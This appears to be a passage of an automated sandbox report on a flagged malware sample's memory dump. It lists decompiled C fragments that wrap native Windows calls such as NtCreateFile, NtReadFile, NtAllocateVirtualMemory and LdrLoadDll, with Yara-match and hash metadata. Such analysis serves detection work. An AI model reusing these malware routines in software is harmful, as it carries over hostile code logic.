                            • Source File: 00000003.00000002.328058419.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: FileRead
                            • String ID: !:A$b=A$b=A
                            • API String ID: 2738559852-704622139
                            • Opcode ID: 5f11b9a4f07551c04039a202ec8976f1c46010dff19bcbf64d31f324003d4795
                            • Instruction ID: d9f8cd198d05bfb0dbf1137ce7ac063a3907e1a06022e89a2ca1e2d7ee9c4d45
                            • Opcode Fuzzy Hash: 5f11b9a4f07551c04039a202ec8976f1c46010dff19bcbf64d31f324003d4795
                            • Instruction Fuzzy Hash: 7EF0E7B2200208ABCB14DF89DC81EEB77A9AF8C754F118249BA1D97291D630E8518BA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00418280, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
                            Download Yara Rule
                            C-Code - Quality: 25%
                            			E00418280(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, void* _a32, intOrPtr _a36, char _a40) {
				intOrPtr _t16;
				void* _t18;
				intOrPtr _t24;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E00418DD0(_t27, _a4, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x413a21
				_t24 = _a28;
				_t16 = _a24;
				asm("sbb al, 0x51");
				_t12 =  &_a8; // 0x413d62
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _t16, _t24, _a36,  *_t4); // executed
				return _t18;
			}








                            0x00418283
                            0x0041828f
                            0x00418297
                            0x0041829c
                            0x004182a9
                            0x004182ad
                            0x004182af
                            0x004182bd
                            0x004182c5
                            0x004182c9

                            APIs
                            • NtReadFile.NTDLL(b=A,5E972F59,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,5E972F59,00413D62,?,00000000), ref: 004182C5
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.328058419.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: FileRead
                            • String ID: !:A$b=A$b=A
                            • API String ID: 2738559852-704622139
                            • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                            • Instruction ID: 51f5fae1d88b5840d166f8ea9f31b1482cd02544441b85bb92b9de754d914906
                            • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                            • Instruction Fuzzy Hash: F0F0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158249BA1D97241DA30E8518BA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 004182CA, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39filenativeCOMMON
                            Download Yara Rule
                            APIs
                            • NtReadFile.NTDLL(b=A,5E972F59,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,5E972F59,00413D62,?,00000000), ref: 004182C5
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.328058419.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: FileRead
                            • String ID: b=A
                            • API String ID: 2738559852-3743547364
                            • Opcode ID: 2f639de84dda8707260ae3967343960b60cd3538bbe756acbc4ca2ceab2e45fb
                            • Instruction ID: 5540c287bb30cb0a87f8cd44d48b6821f1f91ae2c3704d8e39907c10b98efcf6
                            • Opcode Fuzzy Hash: 2f639de84dda8707260ae3967343960b60cd3538bbe756acbc4ca2ceab2e45fb
                            • Instruction Fuzzy Hash: C6F030722001046BDB14DF98EC81DE77768EF88750F00855DFA1C8B281C634E95187A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 004181CA, Relevance: 1.6, APIs: 1, Instructions: 68filenativeCOMMON
                            Download Yara Rule
                            C-Code - Quality: 23%
                            			E004181CA(void* __ebx, void* __edi, long _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				void* __esi;
				void* __ebp;
				void* _t23;
				signed char _t29;
				intOrPtr* _t36;

				_t35 = __edi + 1;
				if(__edi + 1 >= 0) {
					 *(__ebx + 0x6a561048) =  *(__ebx + 0x6a561048) | _t29;
					asm("daa");
					_t3 = _t23 + 0xc3c; // 0xc64
					_t36 = _t3;
					E00418DD0(_t35);
					return  *((intOrPtr*)( *_t36))(_a12, _a16, _a20, _a24, _a28, _t23, _t36, _t29, 0);
				} else {
					asm("out dx, eax");
					asm("loope 0xe");
					__ebp = __esp;
					__eax = _a4;
					_t11 = __eax + 0xc40; // 0xc40
					__esi = _t11;
					E00418DD0(__edi, _a4, _t11,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28) = _a44;
					_a32 = _a20;
					__eax = _a8;
					__eax = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
					__esi = __esi;
					__ebp = __ebp;
					return __eax;
				}
			}








                            0x004181ca
                            0x004181cb
                            0x00418195
                            0x0041819b
                            0x0041819f
                            0x0041819f
                            0x004181a7
                            0x004181c9
                            0x004181cd
                            0x004181cd
                            0x004181ce
                            0x004181d1
                            0x004181d3
                            0x004181df
                            0x004181df
                            0x004181ef
                            0x00418209
                            0x00418215
                            0x0041821d
                            0x0041821f
                            0x00418220
                            0x00418221
                            0x00418221

                            APIs
                            • NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 0041821D
                            Memory Dump Source
                            • Source File: 00000003.00000002.328058419.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: CreateFile
                            • String ID:
                            • API String ID: 823142352-0
                            • Opcode ID: ee6a90a3af7f317368955cb15caf7a21470745238cd145d0c1ca90ce2b4d9dd1
                            • Instruction ID: f1c2b8e1b291d449183e3ed8341e88488e617c06c0be9db51ef9922168d6f56d
                            • Opcode Fuzzy Hash: ee6a90a3af7f317368955cb15caf7a21470745238cd145d0c1ca90ce2b4d9dd1
                            • Instruction Fuzzy Hash: 86110AB2600208ABCB14DF88DC85EEB37ADAF8C754F15864DBA0D97241DA34E8518BA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00409B30, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00409B30(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041AB60( &_v536,  &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041AF80(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041B200( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E00419310(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                            0x00409b4c
                            0x00409b4f
                            0x00409b54
                            0x00409b59
                            0x00409b63
                            0x00409b68
                            0x00409b6b
                            0x00409b6d
                            0x00409b75
                            0x00409b7a
                            0x00409b7a
                            0x00409b81
                            0x00409b89
                            0x00409b8c
                            0x00409b8e
                            0x00409ba2
                            0x00000000
                            0x00409ba4
                            0x00409baa
                            0x00409b5e
                            0x00409b5e
                            0x00409b5e

                            APIs
                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BA2
                            Memory Dump Source
                            • Source File: 00000003.00000002.328058419.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: Load
                            • String ID:
                            • API String ID: 2234796835-0
                            • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                            • Instruction ID: 4e6e3ee69d5942d72351b9e79d7f2bfe549f68bd28f2ef5b77caac8f1f18b979
                            • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                            • Instruction Fuzzy Hash: BB0152B5E0010DA7DB10DAA1DC42FDEB378AB54308F0041A5E918A7281F635EB54C795
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 004181D0, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E004181D0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E00418DD0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                            0x004181df
                            0x004181e7
                            0x0041821d
                            0x00418221

                            APIs
                            • NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 0041821D
                            Memory Dump Source
                            • Source File: 00000003.00000002.328058419.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: CreateFile
                            • String ID:
                            • API String ID: 823142352-0
                            • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                            • Instruction ID: 4ba06d0811943408d915368c3acdb1aee86cb039c5ce671b45e9a6de03e682c0
                            • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                            • Instruction Fuzzy Hash: EAF0B2B2200208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 004183B0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E004183B0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E00418DD0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                            0x004183bf
                            0x004183c7
                            0x004183e9
                            0x004183ed

                            APIs
                            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418FA4,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004183E9
                            Memory Dump Source
                            • Source File: 00000003.00000002.328058419.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: AllocateMemoryVirtual
                            • String ID:
                            • API String ID: 2167126740-0
                            • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                            • Instruction ID: 5f1ba135279249ad747bfdca3347611d303f78695a7cb9da664d5d0d2719559c
                            • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                            • Instruction Fuzzy Hash: 4EF015B2200208ABCB14DF89DC81EEB77ADAF88754F118249BE0897281C630F810CBA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 004183AB, Relevance: 1.5, APIs: 1, Instructions: 29memorynativeCOMMON
                            Download Yara Rule
                            C-Code - Quality: 64%
                            			E004183AB(void* __edi, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t15;

				asm("popad");
				asm("sbb al, 0x4b");
				_t11 = _a4;
				_t4 = _t11 + 0xc60; // 0xca0
				E00418DD0(__edi, _a4, _t4,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t15 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t15;
			}




                            0x004183ab
                            0x004183ac
                            0x004183b3
                            0x004183bf
                            0x004183c7
                            0x004183e9
                            0x004183ed

                            APIs
                            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418FA4,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004183E9
                            Memory Dump Source
                            • Source File: 00000003.00000002.328058419.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: AllocateMemoryVirtual
                            • String ID:
                            • API String ID: 2167126740-0
                            • Opcode ID: 06e8330814f503b86a013c7589584d05bb9310e3881c062e94060e3b1e2ccbd4
                            • Instruction ID: a0400cb2c8c5768009f514510cf3f587dd665fca07260f250f8e31a11c07757f
                            • Opcode Fuzzy Hash: 06e8330814f503b86a013c7589584d05bb9310e3881c062e94060e3b1e2ccbd4
                            • Instruction Fuzzy Hash: D5F0A0B1100149ABCB04DFA8DCC0CE7BBA8FF88250B15864DF94997202C630E815CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 004182FA, Relevance: 1.5, APIs: 1, Instructions: 22nativeCOMMON
                            Download Yara Rule
                            C-Code - Quality: 68%
                            			E004182FA(void* __eax, intOrPtr _a4, void* _a8) {
				long _t10;
				void* _t13;

				asm("cld");
				_push(0x559a124d);
				_t7 = _a4;
				_t2 = _t7 + 0x10; // 0x300
				_t3 = _t7 + 0xc50; // 0x409753
				E00418DD0(_t13, _a4, _t3,  *_t2, 0, 0x2c);
				_t10 = NtClose(_a8); // executed
				return _t10;
			}





                            0x004182fb
                            0x00418300
                            0x00418303
                            0x00418306
                            0x0041830f
                            0x00418317
                            0x00418325
                            0x00418329

                            APIs
                            • NtClose.NTDLL(00413D40,?,?,00413D40,00408B03,FFFFFFFF), ref: 00418325
                            Memory Dump Source
                            • Source File: 00000003.00000002.328058419.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: Close
                            • String ID:
                            • API String ID: 3535843008-0
                            • Opcode ID: 8823069db33eae87361c693a5e29dc6685d6a416770808bd80f14b5a543e75c6
                            • Instruction ID: a7ac919464abc00324f4b07dc6d4193c11f854f0200288fb74daa4fd63f6de7d
                            • Opcode Fuzzy Hash: 8823069db33eae87361c693a5e29dc6685d6a416770808bd80f14b5a543e75c6
                            • Instruction Fuzzy Hash: 5DE0C232200318ABD710EFD4CC45ED77768EF44750F004099BE189B382D534EA0087E0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00418300, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00418300(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409753
				E00418DD0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                            0x00418303
                            0x00418306
                            0x0041830f
                            0x00418317
                            0x00418325
                            0x00418329

                            APIs
                            • NtClose.NTDLL(00413D40,?,?,00413D40,00408B03,FFFFFFFF), ref: 00418325
                            Memory Dump Source
                            • Source File: 00000003.00000002.328058419.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: Close
                            • String ID:
                            • API String ID: 3535843008-0
                            • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                            • Instruction ID: e0948211a995ee673693cff6b37ba25287d5fac55aefcf59dfc2265e20a22c74
                            • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                            • Instruction Fuzzy Hash: EAD012752003146BD710EF99DC45ED7775CEF44750F154559BA185B282C570F90086E0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01329910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 43a7ef2ce36bc2a15d164013d2216527106613abfed4cf26bc68f4db556f9dc4
                            • Instruction ID: 402676610ac8568d7abcee48d8c72ad35a5a4df04d43e9b32c4c6e5b9fb782b9
                            • Opcode Fuzzy Hash: 43a7ef2ce36bc2a15d164013d2216527106613abfed4cf26bc68f4db556f9dc4
                            • Instruction Fuzzy Hash: ED9002B521100402D540719944047460005A7D0346F91C021A5054555EC6998DE976A9
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 013299A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: ca763453eab14b61a1bd17db91a4c9275ef3502d21ee8e6aa084265d9e4fe80c
                            • Instruction ID: 09bb0bfce5f4f2760e4ea8d6a25462cbf2505c059c3d245e019ea871196c93e2
                            • Opcode Fuzzy Hash: ca763453eab14b61a1bd17db91a4c9275ef3502d21ee8e6aa084265d9e4fe80c
                            • Instruction Fuzzy Hash: 1D9002A535100442D50061994414B060005E7E1346F91C025E1054555DC659CC66716A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01329860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 63cb74d7948319eccbbb31fd44db33eb97cfc1fb8b064ad401928d431c7716b2
                            • Instruction ID: 434c3af4813a356043cbf5f7a0518a9b42749c077c6a748d4f4a2b1c0c1754ad
                            • Opcode Fuzzy Hash: 63cb74d7948319eccbbb31fd44db33eb97cfc1fb8b064ad401928d431c7716b2
                            • Instruction Fuzzy Hash: 8C90027521100413D511619945047070009A7D0286FD1C422A0414559DD6968966B165
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01329840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 97bd168ffe0d7985c1aa05dd301cb9b2f33dcd1d1f2b16f0d5d3ab555077d194
                            • Instruction ID: abf6581e24496456358ebf3703333d23f8b44ee451108180e93014b2cc832a11
                            • Opcode Fuzzy Hash: 97bd168ffe0d7985c1aa05dd301cb9b2f33dcd1d1f2b16f0d5d3ab555077d194
                            • Instruction Fuzzy Hash: E8900265252041529945B19944045074006B7E02867D1C022A1404951CC566986AE665
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 013298F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 60217de4fb1ad2d482f52adb0405c1b9efc1e928a35c878100277d9c4fec2b65
                            • Instruction ID: 4f0be1cddf4fc4f4ade7834e2fa767e36e5cfde2c0b9a5b2a2b59497fa4d0790
                            • Opcode Fuzzy Hash: 60217de4fb1ad2d482f52adb0405c1b9efc1e928a35c878100277d9c4fec2b65
                            • Instruction Fuzzy Hash: 4290026561100502D50171994404616000AA7D0286FD1C032A1014556ECA6589A6B175
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01329A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 4e57c81ba86d788a9edf35ec6e07bfebded6297209a8a9fb4b960b3217e865fc
                            • Instruction ID: 27132ddf41ff727e806d2f1cebcb0bdd2f579c4c5b9585c468d1d3d2c526b470
                            • Opcode Fuzzy Hash: 4e57c81ba86d788a9edf35ec6e07bfebded6297209a8a9fb4b960b3217e865fc
                            • Instruction Fuzzy Hash: EF90026561100042854071A988449064005BBE1256791C131A0988551DC599887966A9
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01329A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: dcbc0e786545b85bcbc3cbaba95c5e5905c4b6b32f77d9c2b032b61ea154321d
                            • Instruction ID: 514209fc1c9e75eb3e970fe2bab7d7e989529670d7c490c35b320f70024259cc
                            • Opcode Fuzzy Hash: dcbc0e786545b85bcbc3cbaba95c5e5905c4b6b32f77d9c2b032b61ea154321d
                            • Instruction Fuzzy Hash: B390027521140402D5006199481470B0005A7D0347F91C021A1154556DC665886575B5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01329A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 8ce0442f85e3c25d2c7f9b3d4ab699df900fe9f54df085eb931796e84b446e2d
                            • Instruction ID: 4b22c7365ae1b96f25b3667043ea482c8b5b12bb16e987e6514c764df1e50c2a
                            • Opcode Fuzzy Hash: 8ce0442f85e3c25d2c7f9b3d4ab699df900fe9f54df085eb931796e84b446e2d
                            • Instruction Fuzzy Hash: 5390026522180042D60065A94C14B070005A7D0347F91C125A0144555CC95588756565
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01329540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 5994986cc3f056467d5a0df929565a0dbcff9baf07ddd9630e4731660e25f4c2
                            • Instruction ID: eb8e2da4fa7ecfba83547d7f1d1785d66f51d8ed1e3d5f158f542d7917f81c3c
                            • Opcode Fuzzy Hash: 5994986cc3f056467d5a0df929565a0dbcff9baf07ddd9630e4731660e25f4c2
                            • Instruction Fuzzy Hash: AE900269221000034505A59907045070046A7D5396391C031F1005551CD66188756165
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 013295D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: f1dfc20d2d33cf645172bdb49c0840d27359488e55ad5e222e69e0df0caccfb4
                            • Instruction ID: 965085982d841574162a034dcd188474c68d46588c426f6adf73ec596f0d45c5
                            • Opcode Fuzzy Hash: f1dfc20d2d33cf645172bdb49c0840d27359488e55ad5e222e69e0df0caccfb4
                            • Instruction Fuzzy Hash: DB9002A521200003850571994414616400AA7E0246B91C031E1004591DC56588A57169
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01329710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: e030ad2f649ba53e6064771cec29ed19b883f77930f0eb4ca46a941a349986e3
                            • Instruction ID: 7daf28afb2538106d02f00def1c5b86cb7bcff63d251060ddc306df214d06b20
                            • Opcode Fuzzy Hash: e030ad2f649ba53e6064771cec29ed19b883f77930f0eb4ca46a941a349986e3
                            • Instruction Fuzzy Hash: DA90027521100402D50065D954086460005A7E0346F91D021A5014556EC6A588A57175
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 013297A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 0e8e5c998c87c5f2e9a40e49dad67031032529452b964240b556ec4cd4fabdb6
                            • Instruction ID: 119af4e03bff4f070ac25d927cf7778f63c4730d94f4dd88572bab5d3be940ff
                            • Opcode Fuzzy Hash: 0e8e5c998c87c5f2e9a40e49dad67031032529452b964240b556ec4cd4fabdb6
                            • Instruction Fuzzy Hash: 5090026531100003D540719954186064005F7E1346F91D021E0404555CD955886A6266
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01329780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: c1218af96d345031e485f3538688fac2b9f4286b5812fde9298c2d57a7d0bf13
                            • Instruction ID: 4b3a013bb2b87b55a6de918646816c0e9b8332ea6f5ed00d8c825bd9a675b5cb
                            • Opcode Fuzzy Hash: c1218af96d345031e485f3538688fac2b9f4286b5812fde9298c2d57a7d0bf13
                            • Instruction Fuzzy Hash: 6990026D22300002D5807199540860A0005A7D1247FD1D425A0005559CC955887D6365
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01329FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: b3c42e656462f0c0c1ecb6861566305a8eba8de46e6f630a852ea9fac61fba61
                            • Instruction ID: ee0b792d728e6b675fdcf1f9f2661fb82848786619d019350fb35e1ef77130e4
                            • Opcode Fuzzy Hash: b3c42e656462f0c0c1ecb6861566305a8eba8de46e6f630a852ea9fac61fba61
                            • Instruction Fuzzy Hash: 4590027532114402D510619984047060005A7D1246F91C421A0814559DC6D588A57166
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01329660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: db35164f1c0bd75f4e79f4dc41b9d388b77b12a5314bf57e069a52c889c39a37
                            • Instruction ID: c79bd2d211825c5ff8017f9bbfbc1cb828f55274d0210b50cb3624783f1afd84
                            • Opcode Fuzzy Hash: db35164f1c0bd75f4e79f4dc41b9d388b77b12a5314bf57e069a52c889c39a37
                            • Instruction Fuzzy Hash: E790027521100802D5807199440464A0005A7D1346FD1C025A0015655DCA558A6D77E5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 013296E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
